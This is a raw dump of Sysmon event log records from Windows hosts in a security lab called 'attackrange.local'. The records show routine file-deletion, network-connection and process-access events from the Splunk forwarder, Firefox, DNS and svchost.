23542300x8000000000000000439823Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:59.041{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=057A3C65DFB3189747BAFD154BC0AC2B,SHA256=94D04AD71E63BC400D06150DE283B94BDB751D02023C83DA6347429036CBDFD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291119Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.717{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\google4\goog-unwanted-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291118Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.717{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\google4\goog-malware-proto.metadataMD5=57C68C5F5A566D85A117A36860948C39,SHA256=B4615BC3ED907CD1DD6EAB2B48E33402E5B351A4716585BAB890F961274ED098,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291117Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.717{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\google4\goog-malware-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291116Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.701{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\google4\goog-phish-proto.metadataMD5=DE09FAB41B1A15A340B1DD1128CEE66C,SHA256=7A98DE1FAB89C08ADF0C3486A12FD0C20430BCB086F9B931ABC524F993FDE4F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291115Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.665{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\zh9k90mg.default-release\safebrowsing-updating\google4\goog-phish-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000439833Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:57.139{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-932.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal58407- 354300x8000000000000000439832Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:57.137{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-932.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal50700- 10341000x8000000000000000439831Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:00.070{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439830Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:00.070{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439829Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:00.064{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=687D241235CCC0376212891031AABFC8,SHA256=90A1D8DD2B00655AB4D8FF8426C8C554FBDEC21E3F73656797F8BA8D7CD4B22E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291172Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:00.434{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zh9k90mg.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291171Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:57.985{BEA10069-276A-6087-1610-00000000BB01}2640C:\Program Files\Mozilla Firefox\firefox.exeWIN-HOST-96\Administratortcptruefalse10.0.1.15win-host-96.attackrange.local50594-false104.16.249.249-443https 354300x8000000000000000291175Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:58.019{BEA10069-276A-6087-1610-00000000BB01}2640C:\Program Files\Mozilla Firefox\firefox.exeWIN-HOST-96\Administratortcptruefalse10.0.1.15win-host-96.attackrange.local50595-false142.251.33.106sea30s10-in-f10.1e100.net443https 23542300x8000000000000000291174Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:01.235{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDAF9D2FFA1AEC6BECE340B2BE189959,SHA256=13E3F006FADF017DF435B40093C0F974CA0D9CB0C0C1CF9D2086DF5CD5169EBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291173Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:01.235{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F1E3C00442D853ADDFC0565E6B5A83D,SHA256=7928076AE28E62C016DB95B5FD63C6C582A478EF900D75A06BAEB0944E9A41DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439836Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:01.296{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DCC42CB04EAEEFB36604BFBBED9C8C4,SHA256=4530F69580E81632035068F15F41F7D09F94F75372226B229ED16319B5DAF757,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439835Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:01.071{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439834Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:01.071{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439839Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:02.308{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12E2554002577229EDAE755BA3AF14A0,SHA256=621699E14CA2A9A340E139597C064A92CCB751378D91B585FA15403B544CE104,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291177Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:59.345{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50596-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291176Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:02.338{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA27321FAA3184719C5D59B3CEAF266D,SHA256=31FF541756F6BFEC9F8F806E70A319B31369AFCB6D4F301C6FA0691501DD13E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439838Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:02.072{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439837Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:02.072{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439842Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:03.313{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6584045383450E76272215754A6FF13,SHA256=5BC3C1E9708FE092ADDC78E8A8DEDAE1521277D7C1446047093ABF4DB0218F40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291178Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:03.340{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB8868C84262604C4C292DA8ADF005DD,SHA256=906130821684917ABBBE95EEFF42389ABF54993C8775E98DC5780D8983ABC6D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439841Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:03.073{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439840Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:03.073{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291179Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:04.358{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB33E196C51FE0E046AF387D3D32233B,SHA256=9420DFF581A14C31AD30701E0BF283D07A85091BDF649ED740444E82E023C8F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439845Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:04.546{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C2BCA1F7AF0741F3D61807BDE36D6A4,SHA256=05D00B951E7B754D8CC7C92E54817E8DA36290FC1EA089C7926FAE52CC7D4E4C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439844Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:04.074{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439843Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:04.074{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439850Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:05.580{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF35CE2441F7EFE7097E7EF5B7C5FF2F,SHA256=65A46E4BCC579C696AD03CECC2A986AE0C1AC71E280EBB680FECF138721D9785,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291180Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:05.359{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10F6F735F8D2B4D3C280489A3A93D3F8,SHA256=7C4065E0EA7B6E007ED3EA0697ACB1D4D017023C62BA3616AA1636939BFF332E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439849Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:05.307{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=203787C0228C66CFE8D66054F3363D7A,SHA256=621FF2471E9EB3550C3B61F2E3B1BDADAD4DE19C83A0014FE7B69C7821C8CB45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439848Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:05.306{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=35E77510F16CFE6E51E078B1AF1BE24F,SHA256=6F85286D891BBC083B65E3BB317AE0E0B96E4BD39988FBACFE1D29312BA80C3B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439847Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:05.075{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439846Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:05.075{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439854Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:06.594{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=026C3513FDF0C379882A9D0E3D3246B8,SHA256=1D1CD6A29010DA64301DF518CE55DDA8639DFB73847150EECFF6CE7CA04918F5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291183Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:04.355{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50597-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291182Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:06.362{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F43100CAB3E55D41FD5B9528EEC757C,SHA256=C47E6D91A8A30FCFC15066D2B0B6BFAD4A744F1C45F8535539CDEBA56B0DA774,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000439853Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:02.546{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62374-false10.0.1.12-8000- 10341000x8000000000000000439852Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:06.076{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439851Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:06.076{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291181Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:06.077{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=81B365A5119D95CFD8CC07457F677162,SHA256=B322F7A3D7EFDF588761AB54EC96E2C76231662C9F302FEF50FAC16A5A359775,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439857Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:07.822{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 